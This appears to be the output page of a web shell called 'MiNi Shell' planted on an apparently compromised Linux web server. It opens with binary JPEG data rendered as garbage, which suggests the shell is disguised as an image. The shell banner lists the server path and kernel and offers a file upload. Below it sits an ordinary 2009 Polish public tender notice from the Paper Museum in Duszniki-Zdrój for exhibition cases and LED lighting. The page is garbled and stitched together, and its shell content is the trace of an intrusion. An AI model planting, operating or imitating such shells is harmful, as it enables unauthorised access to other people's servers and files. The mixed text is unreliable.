JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090325/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090325/76636-N-2009.html

<p class="kh_header"><b>Duszniki-Zdrój: Wykonanie i instalacja sprzętu wystawowego dla Muzeum Papiernictwa w Dusznikach Zdroju</b><br>
<b>Numer ogłoszenia: 76636 - 2009; data zamieszczenia: 25.03.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Muzeum Papiernictwa w Dusznikach Zdroju , ul. Kłodzka 42, 57-340 Duszniki-Zdrój, woj. dolnośląskie, tel. 074 8669248, faks 074 8669020.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.muzpap.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Samorządowa instytucja kultury - Muzeum.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonanie i instalacja sprzętu wystawowego dla Muzeum Papiernictwa w Dusznikach Zdroju.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest wykonanie sprzętu wystawowego łącznie z systemem oświetleniowym wraz z dostarczeniem i instalacją w siedzibie Zamawiającego według projektu i pod nadzorem jego autorów. 
Szczegółowy opis techniczny przedmiotu zamówienia zawiera Zał. nr 5 do Specyfikacji Istotnych Warunków Zamówienia - dokumentacja projektowa: PROJEKT ARANŻACJI WNĘTRZA SALI DYDAKTYCZNO -WYSTAWOWEJ WRAZ Z PROJEKTEM SPRZĘTU EKSPOZYCYJNEGO - część A - opisowa i część B  - graficzna.
Inne wymaganie dotyczące przedmiotu zamówienia:

1.Zamawiający wymaga, aby Wykonawca udzielił gwarancji jakości oraz rękojmi na co najmniej 36 miesięcy licząc od dnia przekazania bezusterkowego protokołu odbioru potwierdzającego dopuszczenie sprzętu wystawowego do eksploatacji. 
2. Gabloty powinny być oznaczone znakiem CE zgodnie z aktualnie obowiązującym Rozporządzeniem Ministra Gospodarki z dnia 21 sierpnia 2007 r. w sprawie zasadniczych wymagań dla sprzętu elektrycznego (Dz. U. Nr 155 poz. 1089). 
3. Wykonawca w deklaracji zgodności oprócz zadeklarowania spełnienia ww. rozporządzenia powinien zadeklarować spełnienie wymagań normy PN-EN 60598-2-2:2000 - Oprawy oświetleniowe. Wymagania szczegółowe. Oprawy oświetleniowe wbudowywane. Spełnienie wymagań powyższej normy potwierdzone raportem z badań traktuje się jak spełnienie wymagań rozporządzenia. Właściwie wypełniona deklaracja zgodności i kompletna dokumentacja techniczna jest podstawą do znakowania wyrobów CE.
4. Wykonawca gablot jest zobowiązany przeprowadzić badania końcowe układów elektrycznych  gablot, zgodnie z normą PN-EN 60598 - 1: 2000 Oprawy oświetleniowe część I. Wymagania ogólne i badania oraz przedstawić Zamawiającemu pozytywne wyniki tych badań w postaci Raportu z Badań oraz aktualnych uprawnień osób badających.
5. Wykonawca jest zobowiązany do przedłożenia opisów schematów elektrycznych zaopiniowanych przez  inżyniera elektryka z odpowiednimi uprawnieniami pod kątem bezpieczeństwa, funkcjonalności i spełniania odpowiednich norm branżowych. Schematy dla poszczególnych pojedynczych rodzajów gablot, a także ich zestawów powinny zawierać topologię połączeń diod LED, grubości przewodów elektrycznych, danych dotyczących układu regulacji jasności, zasilania diod LED oraz prądów rozruchowych występujących w układach. Przedstawione schematy będą podstawą oceny możliwości przyłączenia proponowanych układów elektrycznych do istniejących w Muzeum instalacji elektrycznych. 
6. Wykonawca jest zobowiązany do dostarczenia Raportu z badań Certyfikowanej Jednostki Badawczej na zgodność proponowanego oświetlenia LED z normą PN-EN 60598-2-1:1989 stosowana w powiązaniu z EN 60598-1:2004 umożliwiającego po realizacji zadania wystawienia deklaracji CE dla zamontowanych układów oświetleniowych. 
7. Zamawiający zaleca, aby Wykonawca dokonał wizji lokalnej obiekcie, tj. Sali wystawienniczo-edukacyjnej Muzeum Papiernictwa w Dusznikach Zdroju w celu uzyskania wszelkich informacji, które mogą być potrzebne do przygotowania oferty oraz zawarcia umowy i wykonania zamówienia. W szczególności celem dokonania prawidłowej wyceny przedmiotu zamówienia Wykonawca winien zapoznać się z projektem, dokonać obmiarów i sporządzić na tej podstawie kalkulację wynagrodzenia ryczałtowego.  
W sprawie ustalenia dogodnego terminu przeprowadzenia wizji lokalnej należy skontaktować się z  osobami wskazanymi w Rozdziale XVII niniejszej SIWZ.
Koszty wykonania wizji ponosi Wykonawca..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 39.15.40.00-6, 31.52.20.00-7, 31.22.00.00-4.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 90.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
<p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> O udzielenia zamówienia mogą się ubiegać wykonawcy, którzy:
1) Spełniają warunki, o których mowa w art. 22 ust. 1 Ustawy Pzp i nie podlegają
wykluczeniu z postępowania o udzielenie zamówienia publicznego na podstawie art. 24 Ustawy tj.:
a) posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli
ustawy nakładają obowiązek posiadania takich uprawnień;
b) posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i
osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie
innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do
wykonania zamówienia;
c) znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie
zamówienia;
d) nie podlegają wykluczeniu z postępowania o udzielenie zamówienia.
2) przedstawią wykaz wykonanych zamówień (z wykazu musi wynikać, że zostało
zrealizowane zamówienie wykonania i instalacji sprzętu wystawowego a nie dostawa
mebli) w okresie ostatnich trzech lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, odpowiadających swoim rodzajem i wartością zamówieniu stanowiącemu przedmiot postępowania, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączą dokumenty potwierdzające, że zamówienia te zostały wykonane należycie.
2. Ocena spełnienia warunku o którym mowa w ust. 1 pkt 1 a-d, zostanie dokonana na podstawie dokumentów o których mowa w rozdziale V ust. 1 pkt 1, 3, 4.
3. Uznaje się, iż Wykonawca spełnia warunek znajdowania się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia jeżeli posiada środki finansowe lub zdolność kredytową nie mniejszą 100% ceny brutto podanej w formularzu ofertowym z tytułu realizacji całego przedmiotu zamówienia.
4. Ocena warunku o którym mowa w ust. 1 pkt 2 zostanie dokonana na podstawie
dokumentu, o którym mowa w rozdziale V ust. 1 Pkt 2. Za posiadanie należytego
doświadczenia będzie uznawane wykonanie co najmniej pięciu zamówień
odpowiadających swoim rodzajem zamówieniu stanowiącemu przedmiot postępowania o wartości min. 100.000 zł netto każde, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentów potwierdzających, że zamówienia te zostały wykonane należycie.
5. Za zamówienie odpowiadające swoim rodzajem zamówieniu stanowiącemu
przedmiot postępowania - należy rozumieć wykonanie i montaż, w ramach jednej
umowy, sprzętu wystawowego - gabloty muzealne, stelaże dla prezentacji obiektów
muzealnych, podesty, systemy do podwieszania obiektów itp..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1. Zamawiający żąda od wykonawców przedstawienia niżej wymienionych dokumentów:
1) aktualnego odpisu z właściwego rejestru albo aktualnego zaświadczenia o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawionego nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert,
2) wykazu wykonanych zamówień (z wykazu musi wynikać, że została zrealizowane zamówienie wykonania i instalacji sprzętu wystawowego, a nie dostawa mebli) w okresie ostatnich trzech lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, odpowiadających swoim rodzajem i wartością zamówieniu stanowiącemu przedmiot postępowania, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentów potwierdzających, że te zamówienia zostały wykonane należycie, wg wzoru zał. Nr 3 do SIWZ,
3) oświadczenia o spełnieniu warunków określonych w art. 22 ust. 1 ustawy Prawo Zamówień Publicznych oraz nie podleganiu wykluczeniu z postępowania na podst. art. 24 Pzp, wg  Zał. Nr 4 do SIWZ,
4) informacji banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których wykonawca posiada rachunek, potwierdzającej wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawionej nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert; 
5) W celu potwierdzenia, że oferowane usługi i dostawy odpowiadają wymaganiom określonym przez zamawiającego, Zamawiający żąda przedłożenia:
a) Opisów schematów elektrycznych zaopiniowanych przez  inżyniera elektryka z odpowiednimi uprawnieniami pod kątem bezpieczeństwa, funkcjonalności i spełniania odpowiednich norm branżowych. Schematy dla poszczególnych pojedynczych rodzajów gablot, a także ich zestawów powinny zawierać topologię połączeń diod LED, grubości przewodów elektrycznych, danych dotyczących układu regulacji jasności, zasilania diod LED oraz prądów rozruchowych występujących w układach. Przedstawione schematy będą podstawą oceny możliwości przyłączenia proponowanych układów elektrycznych do istniejących w Muzeum instalacji elektrycznych. 
b) Raportu z badań Certyfikowanej Jednostki Badawczej na zgodność proponowanego oświetlenia LED z normą PN-EN 60598-2-1:1989 stosowana w powiązaniu z EN 60598-1:2004  umożliwiającego po realizacji zadania wystawienia deklaracji CE dla zamontowanych układów oświetleniowych. 

2. Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej zamiast dokumentów, o których mowa w ust. 1 pkt. 1, składa dokument lub dokumenty wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że:
a) nie otwarto jego likwidacji ani nie ogłoszono upadłości,
b) nie orzeczono wobec niego zakazu ubiegania się o zamówienie.

3. Dokumenty, o których mowa w ust. 2 lit. a i b, powinny być wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.
4. Jeżeli w kraju pochodzenia osoby lub w kraju w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa w ust. 1 pkt 1-2, zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania. Przepis ust. 3 stosuje się odpowiednio.
5. Dokumenty, o których mowa w niniejszym rozdziale, są składane w formie oryginału lub kopii poświadczonej za zgodność z oryginałem przez wykonawcę. W przypadku składania elektronicznych kopii dokumentów powinny one być opatrzone przez wykonawcę bezpiecznym podpisem elektronicznym weryfikowanym za pomocą ważnego kwalifikowanego certyfikatu.
6. Zamawiający może żądać przedstawienia oryginału lub notarialnie poświadczonej kopii dokumentu wyłącznie wtedy, gdy złożona przez wykonawcę kopia dokumentu jest nieczytelna lub budzi wątpliwości co do jej prawdziwości.
7. Dokumenty sporządzone w języku obcym są składane wraz z tłumaczeniem na język polski, poświadczonym przez wykonawcę. Tłumaczenie nie jest wymagane, jeżeli zamawiający wyraził zgodę, o której mowa w art. 9 ust. 3 ustawy..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.muzpap.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Muzeum Papiernictwa w Dusznikach Zdroju, ul. Kłodzka 42, 57-340 Duszniki Zdrój.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 03.04.2009 godzina 09:00, miejsce: Muzeum Papiernictwa w Dusznikach Zdroju, ul. Kłodzka 42, 57-340 Duszniki Zdrój, sekretariat - na parterze budynku głównego.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com